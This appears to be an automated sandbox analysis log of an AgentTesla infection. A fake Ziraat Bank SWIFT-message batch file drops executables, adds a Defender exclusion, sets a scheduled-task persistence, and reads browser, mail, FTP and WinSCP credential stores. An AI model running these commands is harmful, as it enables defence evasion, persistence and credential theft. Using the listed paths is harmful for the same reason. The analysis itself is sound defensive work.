Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 12:07 /du 23:59 /sc daily /ri 1 /f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp692E.tmp.cmd""	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Process created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02A05ACC
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02A0A7C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	4_2_02A05BD8
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: GetLocaleInfoA,	4_2_02A0A810
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	26_2_02A95ACC
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	26_2_02A95BD7
Source: C:\Users\Public\Libraries\Wisrysxl.PIF	Code function: GetLocaleInfoA,	26_2_02A9A810

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A0920C GetLocalTime,

4_2_02A0920C

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02A0B78C GetVersionExA,

4_2_02A0B78C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: x.exe, 00000004.00000002.1536799829.000000007EC67000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E2A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1475385265.000000007E327000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1476291402.000000007F120000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 13.0.neworigin.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000002.2693859207.0000000002CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1691089667.00000000030C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2693859207.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2692159904.000000000307C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2693859207.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.1512401609.0000000000D92000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2692159904.0000000003084000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1691089667.00000000030D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1691089667.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2692159904.0000000003051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 4352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7572, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
